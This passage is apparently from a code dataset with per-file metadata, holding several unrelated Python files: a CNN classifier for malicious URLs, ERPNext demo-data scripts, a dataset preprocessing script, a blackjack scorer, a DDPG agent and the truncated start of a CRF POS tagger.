seq_id
stringlengths
4
11
text
stringlengths
113
2.92M
repo_name
stringlengths
4
125
sub_path
stringlengths
3
214
file_name
stringlengths
3
160
file_ext
stringclasses
18 values
file_size_in_byte
int64
113
2.92M
program_lang
stringclasses
1 value
lang
stringclasses
93 values
doc_type
stringclasses
1 value
stars
int64
0
179k
dataset
stringclasses
3 values
pt
stringclasses
78 values
13058059804
# Character-level CNN classifier for URLs (benign vs. malicious), written
# against the legacy Keras 1.x API (W_regularizer / border_mode / mode= /
# Model(input=..., output=...) arguments).
from string import printable
from keras.models import Model, load_model
from keras import regularizers
from keras.layers.core import Dense, Dropout, Lambda
from keras.layers import Input, ELU, Embedding, \
    BatchNormalization, Convolution1D, concatenate
from keras.preprocessing import sequence
from keras.optimizers import Adam
from keras import backend as K
from keras.callbacks import CSVLogger
# NOTE(review): this import shadows keras.models.load_model imported above;
# the two-argument load_model/save_model from utils appear to be the intended
# ones (see save_model/load_model methods below) — confirm.
from utils import load_model, save_model
from keras.utils.vis_utils import plot_model


class CNNC:
    """Character-level convolutional network for URL classification.

    Builds four parallel 1-D convolution branches (kernel sizes 2-5) over a
    character embedding of the URL, merges them and feeds two dense layers
    into a single sigmoid output.
    """

    def __init__(self, max_len=75, emb_dim=32, max_vocab_len=100,
                 w_reg=regularizers.l2(1e-4)):
        # max_len:       fixed input length (URLs are padded/truncated to this)
        # emb_dim:       size of the character embedding vectors
        # max_vocab_len: size of the character vocabulary
        # w_reg:         embedding weight regularizer.
        #   NOTE(review): the default is evaluated once at import time and
        #   shared across all instances (mutable-default pattern) — confirm
        #   this is acceptable for the regularizer object.
        self.max_len = max_len
        # Appends per-epoch metrics to CNN_log.csv across training runs.
        self.csv_logger = CSVLogger('CNN_log.csv', append=True, separator=';')
        main_input = Input(shape=(max_len,), dtype='int32', name='main_input')

        # Embedding layer
        emb = Embedding(input_dim=max_vocab_len, output_dim=emb_dim,
                        input_length=max_len, W_regularizer=w_reg)(main_input)
        emb = Dropout(0.25)(emb)

        def sum_1d(X):
            # Collapse the time dimension by summing conv activations.
            return K.sum(X, axis=1)

        def get_conv_layer(emb, kernel_size=5, filters=256):
            # Conv layer: conv -> ELU -> sum over time -> dropout.
            conv = Convolution1D(kernel_size=kernel_size, filters=filters, \
                                 border_mode='same')(emb)
            conv = ELU()(conv)
            conv = Lambda(sum_1d, output_shape=(filters,))(conv)
            # conv = BatchNormalization(mode=0)(conv)
            conv = Dropout(0.5)(conv)
            return conv

        # Multiple Conv Layers
        # calling custom conv function from above
        conv1 = get_conv_layer(emb, kernel_size=2, filters=256)
        conv2 = get_conv_layer(emb, kernel_size=3, filters=256)
        conv3 = get_conv_layer(emb, kernel_size=4, filters=256)
        conv4 = get_conv_layer(emb, kernel_size=5, filters=256)

        # Fully Connected Layers
        merged = concatenate([conv1, conv2, conv3, conv4], axis=1)

        hidden1 = Dense(1024)(merged)
        hidden1 = ELU()(hidden1)
        hidden1 = BatchNormalization(mode=0)(hidden1)
        hidden1 = Dropout(0.5)(hidden1)

        hidden2 = Dense(1024)(hidden1)
        hidden2 = ELU()(hidden2)
        hidden2 = BatchNormalization(mode=0)(hidden2)
        hidden2 = Dropout(0.5)(hidden2)

        # Output layer (last fully connected layer)
        output = Dense(1, activation='sigmoid', name='output')(hidden2)

        # Compile model and define optimizer
        self.model = Model(input=[main_input], output=[output])
        self.adam = Adam(lr=1e-4, beta_1=0.9, beta_2=0.999,
                         epsilon=1e-08, decay=0.0)
        self.model.compile(optimizer=self.adam, loss='binary_crossentropy',
                           metrics=['accuracy'])

    def save_model(self, fileModelJSON, fileWeights):
        """Persist the model architecture (JSON) and weights via utils.save_model."""
        save_model(self.model, fileModelJSON, fileWeights)

    def load_model(self, fileModelJSON, fileWeights):
        """Load architecture + weights via utils.load_model and recompile."""
        self.model = load_model(fileModelJSON, fileWeights)
        self.model.compile(optimizer=self.adam, loss='binary_crossentropy',
                           metrics=['accuracy'])

    def train_model(self, x_train, target_train, epochs=5, batch_size=32):
        """Fit the model; per-epoch metrics are appended to CNN_log.csv."""
        print("Training CNN model with " + str(epochs) +
              " epochs and batches of size " + str(batch_size))
        self.model.fit(x_train, target_train, epochs=epochs,
                       batch_size=batch_size, verbose=1,
                       callbacks=[self.csv_logger])

    def test_model(self, x_test, target_test):
        """Evaluate on a held-out set; returns Keras' [loss, accuracy] list."""
        print("testing CNN model")
        return self.model.evaluate(x_test, target_test, verbose=1)

    def predict(self, x_input):
        """Classify one URL string; returns 'benign' or 'malicious'.

        Characters are encoded as 1-based indices into string.printable;
        characters outside printable are silently dropped.
        """
        url_int_tokens = [[printable.index(x) + 1 for x in x_input if x in printable]]
        X = sequence.pad_sequences(url_int_tokens, maxlen=self.max_len)
        p = self.model.predict(X, batch_size=1)
        # Sigmoid output below 0.5 is treated as benign.
        return "benign" if p < 0.5 else "malicious"

    def export_plot(self):
        """Write a diagram of the network architecture to CNN.png."""
        plot_model(self.model, to_file='CNN.png')
larranaga/phishing-url-detection
CNNC.py
CNNC.py
py
3,833
python
en
code
5
github-code
36
75075870824
# Demo-data generator for the ERPNext selling cycle (Python 2 — uses xrange).
# Creates random Opportunities, Quotations and Sales Orders dated on a given
# simulation day, committing after each document.
from __future__ import unicode_literals
import frappe
from frappe.utils.make_random import add_random_children, get_random, how_many, can_make
from frappe.utils import cstr
from erpnext.setup.utils import get_exchange_rate
from erpnext.accounts.party import get_party_account_currency


def run_sales(current_date):
    """Create a random number of each selling document for current_date.

    can_make/how_many decide whether and how many documents of each doctype
    to generate on this simulated day.
    """
    if can_make("Opportunity"):
        for i in xrange(how_many("Opportunity")):
            make_opportunity(current_date)

    if can_make("Quotation"):
        for i in xrange(how_many("Quotation")):
            make_quotation(current_date)

    if can_make("Sales Order"):
        for i in xrange(how_many("Sales Order")):
            make_sales_order(current_date)


def make_opportunity(current_date):
    """Insert an Opportunity from a random Customer with up to 4 random items."""
    b = frappe.get_doc({
        "creation": current_date,
        "doctype": "Opportunity",
        "enquiry_from": "Customer",
        "customer": get_random("Customer"),
        "enquiry_type": "Sales",
        "transaction_date": current_date,
    })

    # Random non-variant items, de-duplicated on item_code.
    add_random_children(b, "items", rows=4, randomize={
        "qty": (1, 5),
        "item_code": ("Item", {"has_variants": "0"})
    }, unique="item_code")

    b.insert()
    frappe.db.commit()


def make_quotation(current_date):
    """Submit a Quotation, preferring to convert an open Opportunity.

    Falls back to building a fresh Quotation for a random Customer of the
    demo company "Wind Power LLC", using the party's account currency and
    the corresponding exchange rate.
    """
    # get open opportunites
    opportunity = get_random("Opportunity", {"status": "Open"})

    if opportunity:
        from erpnext.crm.doctype.opportunity.opportunity import make_quotation
        qtn = frappe.get_doc(make_quotation(opportunity))
        qtn.insert()
        frappe.db.commit()
        qtn.submit()
        frappe.db.commit()
    else:
        # make new directly

        # get customer, currency and exchange_rate
        customer = get_random("Customer")

        company_currency = frappe.db.get_value("Company", "Wind Power LLC", "default_currency")
        party_account_currency = get_party_account_currency("Customer", customer, "Wind Power LLC")
        if company_currency == party_account_currency:
            exchange_rate = 1
        else:
            exchange_rate = get_exchange_rate(party_account_currency, company_currency)

        qtn = frappe.get_doc({
            "creation": current_date,
            "doctype": "Quotation",
            "quotation_to": "Customer",
            "customer": customer,
            "currency": party_account_currency or company_currency,
            "conversion_rate": exchange_rate,
            "order_type": "Sales",
            "transaction_date": current_date,
        })

        add_random_children(qtn, "items", rows=3, randomize={
            "qty": (1, 5),
            "item_code": ("Item", {"has_variants": "0"})
        }, unique="item_code")

        qtn.insert()
        frappe.db.commit()
        qtn.submit()
        frappe.db.commit()


def make_sales_order(current_date):
    """Convert a random submitted Quotation into a submitted Sales Order.

    Delivery is scheduled 10 days after current_date. No-op when no
    submitted Quotation exists.
    """
    q = get_random("Quotation", {"status": "Submitted"})
    if q:
        from erpnext.selling.doctype.quotation.quotation import make_sales_order
        so = frappe.get_doc(make_sales_order(q))
        so.transaction_date = current_date
        so.delivery_date = frappe.utils.add_days(current_date, 10)
        so.insert()
        frappe.db.commit()
        so.submit()
        frappe.db.commit()
frappe/erpnext_demo
erpnext_demo/selling.py
selling.py
py
2,758
python
en
code
2
github-code
36
2744395369
# Rule: column index 1 must not contain the value 4.
# Preprocessing script that rewrites the Adult dataset so it satisfies
# hand-picked rules, used as input for Table-GAN experiments.
import pandas as pd
import numpy as np

# Hard-coded local paths to the Adult CSV and output locations.
TRUTH_PATH = "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult.csv"
SAVE_PATH = "./data_with_rule_single_rule.csv"


def single_cell_rule():
    """Enforce the single-cell rule: replace value 4 in column 1 with 6.

    Reads TRUTH_PATH, rewrites offending cells, and writes the full table
    to Adult_rule.csv.
    """
    file = pd.read_csv(TRUTH_PATH, sep=',')
    file = list(np.array(file))
    res = []
    for row in file:
        if row[1] == 4:
            row[1] = 6
        res.append(row)
    res = np.array(res)
    rsf_out = pd.DataFrame(res)
    rsf_out.to_csv(
        "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_rule.csv",
        index=False, sep=',')
    print("输出完成!", res.shape)


def combine_rule():
    """Label rows by a two-column combination rule and write rule datasets.

    A row is labelled negative ([1]) when another row shares its values in
    columns col_1 and col_2 (subject to `threshold`), positive ([0])
    otherwise. Writes the reordered rows to Adult_rule.csv and the labels to
    Adult_rule_labels.csv, then re-reads the output to count violations.
    """
    file = pd.read_csv(TRUTH_PATH, sep=',')
    labels = pd.read_csv(
        "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_labels.csv",
        sep=',')
    labels_ = list(np.array(labels))
    file = list(np.array(file))
    positive = []
    labels = []
    negative = []
    # Column pair the combination rule is evaluated on.
    col_1 = 0
    col_2 = 9
    for (i, _), label in zip(enumerate(file), labels_):
        is_true = True
        threshold = 0
        # NOTE(review): this inner scan includes j == i, and with threshold
        # starting at 0 the self-match alone drives threshold to -1, so every
        # row appears to be classified negative — confirm this is intended.
        for j, _ in enumerate(file):
            if file[i][col_1] == file[j][col_1] and file[i][col_2] == file[j][col_2]:
                threshold -= 1
                if threshold <= 0:
                    is_true = False
                    negative.append(file[i])
                    labels.append([1])
                    break
        if is_true:
            positive.append(file[i])
            labels.append([0])
            # labels.append(label[0])

    # Positives first, then negatives; labels list is built in the same order.
    X = np.array(positive + negative)
    # X = np.array(positive)
    y = np.array(labels)
    X_out = pd.DataFrame(X)
    y_out = pd.DataFrame(y)
    X_out.to_csv(
        "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_rule.csv",
        index=False, sep=',')
    y_out.to_csv(
        "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_rule_labels.csv",
        index=False, sep=',')
    # print(res)

    # Sanity check: re-read the written file and count ordered-pair
    # violations. NOTE(review): this check uses `>` on col_2 while the
    # labelling above uses `==` — confirm the asymmetry is intentional.
    file_rule = pd.read_csv(
        "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_rule.csv",
        sep=',')
    file = list(np.array(file_rule))
    error = 0
    for i, _ in enumerate(file):
        for j, _ in enumerate(file):
            if j <= i:
                continue
            if file[i][col_1] == file[j][col_1] and file[i][col_2] > file[j][col_2]:
                error += 1
    print(
        "输出完成!X_shape:{}, y_shape:{}, error: {}, error rate:{}".format(X.shape, y.shape, error,
                                                                        error / len(file) ** 2))


# single_cell_rule()
combine_rule()
lums199656/Research
rules/去除违反 rules 的数据.py
去除违反 rules 的数据.py
py
2,786
python
en
code
1
github-code
36
25822228264
#!/usr/bin/env python3
# -*- coding: utf-8 -*-


def ui_input() -> str:
    """Prompt the player for their cards and return the raw line."""
    return input('Enter all your cards (with spaces): ')


def blackjack(cards: str) -> int:
    """Score a space-separated blackjack hand.

    Number cards score face value, T/J/Q/K score 10, and each ace ('A')
    scores 11 when that does not push the hand over 21, otherwise 1.
    Tokens that are not recognized cards are ignored.

    Args:
        cards: hand as a space-separated string, e.g. "A K" or "2 9 T".

    Returns:
        The total points for the hand.
    """
    cards_values = {
        '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9,
        'T': 10, 'J': 10, 'Q': 10, 'K': 10,
    }
    aces = 0
    points = 0
    for card in cards.split():
        if card in cards_values:
            points += cards_values[card]
        elif card == 'A':
            aces += 1
    # Score every ace as 1 first, then upgrade a single ace to 11 if that
    # still fits — equivalent to the original per-ace branching, but simpler.
    points += aces
    if aces and points + 10 <= 21:
        points += 10
    return points


def ui_output(points: int) -> None:
    """Print the score, or 'Bust' when the hand exceeds 21."""
    if points <= 21:
        print('Your points: ', points)
    else:
        print('Bust')


if __name__ == '__main__':
    # Guarded entry point (bug fix): previously the prompt ran at import
    # time, so merely importing this module blocked on input().
    ui_output(blackjack(ui_input()))
LiudaShevliuk/python
lab9_1.py
lab9_1.py
py
1,178
python
en
code
0
github-code
36
31062929205
from ..utils import Object


class ChatStatisticsMessageSenderInfo(Object):
    """
    Contains statistics about messages sent by a user

    Attributes:
        ID (:obj:`str`): ``ChatStatisticsMessageSenderInfo``

    Args:
        user_id (:obj:`int`):
            User identifier
        sent_message_count (:obj:`int`):
            Number of sent messages
        average_character_count (:obj:`int`):
            Average number of characters in sent messages; 0 if unknown

    Returns:
        ChatStatisticsMessageSenderInfo

    Raises:
        :class:`telegram.Error`
    """
    ID = "chatStatisticsMessageSenderInfo"

    def __init__(self, user_id, sent_message_count, average_character_count, **kwargs):
        # Keep the raw TDLib fields; any extra keyword arguments are ignored.
        self.user_id = user_id  # int
        self.sent_message_count = sent_message_count  # int
        self.average_character_count = average_character_count  # int

    @staticmethod
    def read(q: dict, *args) -> "ChatStatisticsMessageSenderInfo":
        # Construct the object directly from the deserialized TDLib dict;
        # missing keys become None via dict.get.
        return ChatStatisticsMessageSenderInfo(
            q.get('user_id'),
            q.get('sent_message_count'),
            q.get('average_character_count'),
        )
iTeam-co/pytglib
pytglib/api/types/chat_statistics_message_sender_info.py
chat_statistics_message_sender_info.py
py
1,244
python
en
code
20
github-code
36
471364125
# Adapted from https://github.com/mimoralea/gdrl
# DDPG agent with prioritized experience replay for a Unity ML-Agents style
# environment (env.reset(...)[brain_name] / vector_observations interface).
from helpers.utils.action_selection import GreedyStrategy, NormalNoiseStrategy
from helpers.utils.priority_replay import Memory
from helpers.nn.network import FCQV, FCDP
from itertools import count
import torch.optim as optim
import numpy as np
import torch
import time
import glob
import os
import gc

# Minimum seconds between persistent debug prints during training.
LEAVE_PRINT_EVERY_N_SECS = 300
RESULTS_DIR = os.path.join('..', 'results')
ERASE_LINE = '\x1b[2K'


class DDPG_agent:
    """Deep Deterministic Policy Gradient agent.

    Holds online/target policy (FCDP) and value (FCQV) networks, a
    prioritized replay buffer, and the training/evaluation loops.
    """

    # NOTE(review): the dict defaults below are mutable default arguments
    # (shared across calls); harmless as long as callers always pass their
    # own dicts — confirm.
    def __init__(self, policy_info={}, value_info={}, env_info={}, training_info={}, buffer_info={}):
        # set device target
        self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")

        ### POLICY NETWORK PARAMETERS
        self.online_policy_model = FCDP(env_info["state_size"], env_info["bounds"],
                                        policy_info["hidden_dims"], device=self.device)
        self.target_policy_model = FCDP(env_info["state_size"], env_info["bounds"],
                                        policy_info["hidden_dims"], device=self.device)
        self.policy_optimizer = optim.Adam(self.online_policy_model.parameters(),
                                           lr=policy_info["learning_rate"])
        self.policy_max_grad_norm = policy_info["max_grad_norm"]

        ### VALUE NETWORK PARAMETERS
        self.online_value_model = FCQV(env_info["state_size"], env_info["action"],
                                       value_info["hidden_dims"], device=self.device)
        self.target_value_model = FCQV(env_info["state_size"], env_info["action"],
                                       value_info["hidden_dims"], device=self.device)
        self.value_optimizer = optim.Adam(self.online_value_model.parameters(),
                                          lr=value_info["learning_rate"])
        self.value_max_grad_norm = value_info["max_grad_norm"]

        # TRAINING AND EVALUATION STRATEGY
        self.training_strategy = NormalNoiseStrategy(env_info["bounds"],
                                                     training_info["exploration_noise_ratio"])
        self.update_target_every_steps = training_info["update_every_step"]
        self.evaluation_strategy = GreedyStrategy(env_info["bounds"])
        self.n_warmup_batches = training_info["n_warmup_batches"]
        # Soft-update mixing ratio; when absent, update_networks' tau default applies.
        self.soft_weight_tau = training_info.get("weight_mix_ratio", None)

        # MEMORY INITIALIZATION
        self.replay_buffer = Memory(capacity=buffer_info["size"], seed=training_info["seed"])
        self.batch_size = buffer_info["batch_size"]

        # seed
        torch.manual_seed(training_info["seed"]);
        self.rand_generator = np.random.RandomState(training_info["seed"])

        # lower and upper action value bounds
        self.low_bounds, self.high_bounds = env_info["bounds"]

    def prepopulate(self, brain_name, env):
        """
        First thing called after environment has been setup.
        To avoid the empty memory problem we randomly pre populate the memory.
        This is done by taking random actions and storing them as experiences.

        Args:
            brain_name: (string) name of agent we are using
            env: (object) Environment we are operating in
        """
        # flag for when to reset the environment [when we hit a terminal state]
        reset_check, last_state = False, None
        for idx in range(self.replay_buffer.tree.capacity):
            # if idx is the first step get state or we have to reset
            if idx == 0 or reset_check:
                # change reset check back to false
                reset_check = False
                # reset environment and extract current state
                env_info = env.reset(train_mode=True)[brain_name]
                last_state = env_info.vector_observations[0]

            # take random actions within acceptable bounds
            action = self.rand_generator.uniform(low=self.low_bounds,
                                                 high=self.high_bounds,
                                                 size=len(self.high_bounds))
            # take the action, record reward, and terminal status
            env_info = env.step(action)[brain_name]
            reward = env_info.rewards[0]
            done = env_info.local_done[0]

            # checking status
            if done:
                # set reset flag; terminal "next state" is stored as zeros
                reset_check = True
                state = np.zeros(last_state.shape)
                # store in replay
                self.replay_buffer.store(last_state, action, reward, state, done)
            else:
                # get next state from the environment
                state = env_info.vector_observations[0]
                # store in replay
                self.replay_buffer.store(last_state, action, reward, state, done)
                # update state
                last_state = state

    def update_networks(self, tau=0.1):
        """Polyak (soft) update of both target networks toward the online ones."""
        tau = self.soft_weight_tau if self.soft_weight_tau is not None else tau
        # copy value model
        for target, online in zip(self.target_value_model.parameters(),
                                  self.online_value_model.parameters()):
            target_ratio = (1.0 - tau) * target.data
            online_ratio = tau * online.data
            mixed_weights = target_ratio + online_ratio
            target.data.copy_(mixed_weights)

        # copy policy model
        for target, online in zip(self.target_policy_model.parameters(),
                                  self.online_policy_model.parameters()):
            target_ratio = (1.0 - tau) * target.data
            online_ratio = tau * online.data
            mixed_weights = target_ratio + online_ratio
            target.data.copy_(mixed_weights)

    def load(self, states, actions, rewards, next_states, is_terminals):
        """Convert a batch of numpy experience arrays to float tensors on self.device."""
        # convert to torch tensors
        states = torch.from_numpy(states).float().to(self.device)
        actions = torch.from_numpy(actions).float().to(self.device)
        next_states = torch.from_numpy(next_states).float().to(self.device)
        rewards = torch.from_numpy(rewards).float().to(self.device)
        is_terminals = torch.from_numpy(is_terminals).float().to(self.device)
        # returns tensors
        return states, actions, rewards, next_states, is_terminals

    def optimize_model(self):
        """One gradient step on the value net and one on the policy net.

        Samples a prioritized batch, updates per-sample priorities from the
        absolute TD error, then applies importance-sampling-weighted losses.
        Requires self.gamma, which is set in train().
        """
        # prioritized replay used so we can update priorities on the go: we get
        # the batch indexes, memory, importance sampling weights
        idx_batch, memory_batch, ISweights = self.replay_buffer.sample_per(self.batch_size)
        # convert sampling weights to tensor
        ISweights = torch.from_numpy(ISweights).float().to(self.device)
        # unwrap
        states, actions, rewards, next_states, is_terminals = self.replay_buffer.unwrap_experiences(memory_batch)
        # convert to torch
        states, actions, rewards, next_states, is_terminals = self.load(states, actions, rewards,
                                                                        next_states, is_terminals)

        ## Target policy
        # get maximum policy over all states
        argmax_a_q_sp = self.target_policy_model(next_states)
        # calculate the q values corresponding to the policy above
        max_a_q_sp = self.target_value_model(next_states, argmax_a_q_sp)
        # calculate the TD target q_state action values
        target_q_sa = rewards + self.gamma * max_a_q_sp * (1 - is_terminals)

        ## Online value
        # for each state action pair we calculate the q_values
        q_sa = self.online_value_model(states, actions)

        ## Loss calculations
        td_error_loss = q_sa - target_q_sa.detach()
        # calculate absolute error: convert to numpy
        abs_error = torch.abs(td_error_loss).cpu().detach().numpy()
        # update PER priorities with the new absolute TD errors
        self.replay_buffer.batch_update(idx_batch, abs_error.squeeze())
        # calculate value loss using weighted mean square error
        # NOTE(review): .mul(0.5).pow(2) squares AFTER halving, i.e.
        # (0.5*w*err)^2 rather than the usual 0.5*(w*err)^2 — confirm intended.
        value_loss = (ISweights * td_error_loss).mul(0.5).pow(2).mean()

        # zero optimizer, do a backward pass, clip gradients, and finally optimize
        self.value_optimizer.zero_grad()
        value_loss.backward()
        torch.nn.utils.clip_grad_norm_(self.online_value_model.parameters(),
                                       self.value_max_grad_norm)
        self.value_optimizer.step()

        ## ONLINE POLICY
        argmax_a_q_s = self.online_policy_model(states)
        max_a_q_s = self.online_value_model(states, argmax_a_q_s)
        ## calculate loss using weighted mean (gradient ascent on Q via negation)
        policy_loss = -(ISweights * max_a_q_s).mean()
        self.policy_optimizer.zero_grad()
        policy_loss.backward()
        torch.nn.utils.clip_grad_norm_(self.online_policy_model.parameters(),
                                       self.policy_max_grad_norm)
        self.policy_optimizer.step()

    def interaction_step(self, last_state, env, brain_name):
        """Take one environment step with exploration noise and store the result.

        Returns (next_state, done). Also updates the per-episode reward,
        timestep and exploration trackers appended to in train().
        """
        # initially we randomly explore the sample space
        check = self.replay_buffer.current_storage_size < self.n_warmup_batches * self.batch_size
        action = self.training_strategy.select_action(self.online_policy_model, last_state, check)
        # get environment values
        env_info = env.step(action)[brain_name]
        state = env_info.vector_observations[0]
        reward = env_info.rewards[0]
        done = env_info.local_done[0]
        # store into replay buffer
        self.replay_buffer.store(last_state, action, reward, state, done)
        # update tracking parameters
        self.episode_reward[-1] += reward
        self.episode_timestep[-1] += 1
        self.episode_exploration[-1] += self.training_strategy.ratio_noise_injected
        # return values
        return state, done

    def train(self, env, brain_name, gamma, max_minutes, max_episodes, goal_mean_100_reward):
        """Run the full training loop.

        Stops on wall-clock budget, episode budget, or when the 100-episode
        mean evaluation score reaches goal_mean_100_reward. Returns
        (results, final_eval_score, training_time, wallclock_time), where
        results has one row per episode:
        [total_steps, mean_100_reward, mean_100_eval_score, training_time,
        wallclock_elapsed].
        """
        # initialize tracking parameters
        self.episode_timestep = []
        self.episode_reward = []
        self.episode_seconds = []
        self.evaluation_scores = []
        self.episode_exploration = []
        # gamma is consumed by optimize_model(); it is only set here.
        self.gamma = gamma

        # loop parameters
        total_steps = 0
        training_time = 0
        training_start, last_debug_time = time.time(), float("-inf")

        # storage for results
        results = np.empty((max_episodes, 5))
        results[:] = np.nan

        # start training loop
        for episode in range(1, max_episodes + 1):
            # episode start tick
            episode_start = time.time()
            # refresh environment
            state = env.reset(train_mode=True)[brain_name].vector_observations[0]
            is_terminal = False
            self.episode_reward.append(0.0)
            self.episode_timestep.append(0.0)
            self.episode_exploration.append(0.0)

            for step in count():
                state, is_terminal = self.interaction_step(state, env, brain_name)
                # after making random steps
                check = self.replay_buffer.current_storage_size > (self.n_warmup_batches * self.batch_size)
                if check:
                    # run optimization
                    self.optimize_model()
                # updates every episode
                if np.sum(self.episode_timestep) % self.update_target_every_steps == 0:
                    self.update_networks()
                if is_terminal:
                    gc.collect()
                    break

            # stat tracking
            episode_elapsed = time.time() - episode_start
            self.episode_seconds.append(episode_elapsed)
            training_time += episode_elapsed
            evaluation_score, _ = self.evaluate(self.online_policy_model, env, brain_name)
            self.save_checkpoint(episode - 1, self.online_policy_model)
            total_steps = int(np.sum(self.episode_timestep))
            self.evaluation_scores.append(evaluation_score)

            # mean and std calculations over recent-episode windows
            mean_10_reward = np.mean(self.episode_reward[-10:])
            std_10_reward = np.std(self.episode_reward[-10:])
            mean_100_reward = np.mean(self.episode_reward[-100:])
            std_100_reward = np.std(self.episode_reward[-100:])
            mean_100_eval_score = np.mean(self.evaluation_scores[-100:])
            std_100_eval_score = np.std(self.evaluation_scores[-100:])
            lst_100_exp_rat = np.array(self.episode_exploration[-100:]) / np.array(self.episode_timestep[-100:])
            mean_100_exp_rat = np.mean(lst_100_exp_rat)
            std_100_exp_rat = np.std(lst_100_exp_rat)

            wallclock_elapsed = time.time() - training_start
            results[episode - 1] = total_steps, mean_100_reward, mean_100_eval_score, \
                training_time, wallclock_elapsed

            reached_debug_time = time.time() - last_debug_time >= LEAVE_PRINT_EVERY_N_SECS
            # termination criteria check
            reached_max_minutes = wallclock_elapsed >= max_minutes * 60
            reached_max_episodes = episode >= max_episodes
            reached_goal_mean_reward = mean_100_eval_score >= goal_mean_100_reward
            training_over = reached_max_minutes or reached_max_episodes or reached_goal_mean_reward

            # message string
            elapsed_str = time.strftime("%H:%M:%S", time.gmtime(time.time() - training_start))
            debug_message = 'el {}, ep {:04}, ts {:07}, '
            debug_message += 'ar_10 ts {:05.1f} \u00B1 {:05.1f}, '
            debug_message += 'ar_100 ts {:05.1f} \u00B1 {:05.1f}, '
            debug_message += 'ex 100 {:02.1f} \u00B1 {:02.1f}, '
            debug_message += 'ev {:05.1f} \u00B1 {:05.1f}'
            debug_message = debug_message.format(elapsed_str, episode - 1, total_steps,
                                                 mean_10_reward, std_10_reward,
                                                 mean_100_reward, std_100_reward,
                                                 mean_100_exp_rat, std_100_exp_rat,
                                                 mean_100_eval_score, std_100_eval_score)
            print(debug_message, flush=True)
            if reached_debug_time or training_over:
                print("Debug Message")
                print(debug_message, flush=True)
                last_debug_time = time.time()

            if training_over:
                if reached_max_minutes:
                    print(u'--> reached_max_minutes \u2715')
                if reached_max_episodes:
                    print(u'--> reached_max_episodes \u2715')
                if reached_goal_mean_reward:
                    print(u'--> reached_goal_mean_reward \u2713')
                break

        # get score for last round
        final_eval_score, score_std = self.evaluate(self.online_policy_model, env, brain_name,
                                                    n_episodes=100)
        wallclock_time = time.time() - training_start
        print("Training complete.")
        print('Final evaluation score {:.2f}\u00B1{:.2f} in {:.2f}s training time,'
              ' {:.2f}s wall-clock time.\n'.format(
                  final_eval_score, score_std, training_time, wallclock_time))

        # close and delete the environment
        env.close() ; del env
        self.get_cleaned_checkpoints()
        return results, final_eval_score, training_time, wallclock_time

    def evaluate(self, eval_policy_model, eval_env, brain_name, n_episodes=1):
        """Run n_episodes greedy (noise-free) episodes; return (mean, std) of returns."""
        rs = []
        for _ in range(n_episodes):
            env_info = eval_env.reset(train_mode=True)[brain_name]
            state, done = env_info.vector_observations[0], False
            rs.append(0)
            for _ in count():
                action = self.evaluation_strategy.select_action(eval_policy_model, state)
                env_info = eval_env.step(action)[brain_name]
                state = env_info.vector_observations[0]
                reward = env_info.rewards[0]
                done = env_info.local_done[0]
                rs[-1] += reward
                if done:
                    break
        # return mean and standard deviation
        return np.mean(rs), np.std(rs)

    def save_checkpoint(self, episode_idx, model):
        """Write the model's state dict to results/checkpoint_models/model.<ep>.tar."""
        torch.save(model.state_dict(),
                   os.path.join("results", "checkpoint_models", 'model.{}.tar'.format(episode_idx)))

    def get_cleaned_checkpoints(self, n_checkpoints=4):
        """Keep n_checkpoints evenly spaced checkpoint files; delete the rest.

        Caches the kept paths on self.checkpoint_paths (computed only once).
        """
        try:
            return self.checkpoint_paths
        except AttributeError:
            self.checkpoint_paths = {}

        paths = glob.glob(os.path.join("results", "checkpoint_models", '*.tar'))
        # File names are model.<episode>.tar, so the episode is the 2nd-last dot field.
        paths_dic = {int(path.split('.')[-2]): path for path in paths}
        last_ep = max(paths_dic.keys())
        # NOTE(review): np.int is removed in NumPy >= 1.24 — dtype=int works on
        # all versions; confirm before upgrading NumPy.
        checkpoint_idxs = np.linspace(1, last_ep + 1, n_checkpoints, endpoint=True, dtype=np.int) - 1

        for idx, path in paths_dic.items():
            if idx in checkpoint_idxs:
                self.checkpoint_paths[idx] = path
            else:
                os.unlink(path)
Oreoluwa-Se/Continuous-Control
helpers/agent.py
agent.py
py
16,852
python
en
code
0
github-code
36
6245629363
# -*- coding: utf-8 -*-
# Packaging script for PyIEProxy; `python setup.py test` runs pytest.
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand


class PyTest(TestCommand):
    """Test command that delegates to pytest."""

    # Extra arguments forwarded to pytest.
    # Bug fix: this class attribute was misspelled ``ptest_args`` and thus dead.
    pytest_args = []

    def initialize_options(self):
        TestCommand.initialize_options(self)
        self.pytest_args = []

    def run(self):
        # Imported lazily so pytest is only required when tests are run.
        import pytest
        pytest.main(self.pytest_args)


setup(
    name='PyIEProxy',
    version='0.1.0',
    description='Python IE Proxy Switch',
    url='https://github.com/magichan-lab/pyieproxy',
    author='Magichan',
    author_email='magichan.lab@gmail.com',
    maintainer='Magichan',
    maintainer_email='magichan.lab@gmail.com',
    license='MIT',
    packages=find_packages(exclude=["*.tests"]),
    install_requires=['wheel', 'requests'],
    zip_safe=False,
    entry_points={
        'console_scripts': [
            'ie-proxy = bin.command:main',
        ]},
    extras_require={
        'test': ['pytest-cov', 'pytest-pep8', 'coverage', 'pep8', 'pytest'],
        'docs': ['sphinx'],
    },
    cmdclass={'test': PyTest},
)
magichan-lab/PyIEProxy
setup.py
setup.py
py
1,119
python
en
code
0
github-code
36
33675586325
#!/usr/bin/env python
# coding: utf-8
# CRF-based POS tagger for the AnnCorra corpus: parses CoNLL-style training
# data, builds per-token feature dicts, trains an sklearn-crfsuite model and
# pickles it.

import re
import pickle

from sklearn_crfsuite import CRF
from sklearn_crfsuite import metrics
from sklearn_crfsuite import scorers


def parse(input_):
    """Split CoNLL-style text into parallel token streams.

    Sentences are separated by blank lines; each token line is tab-separated
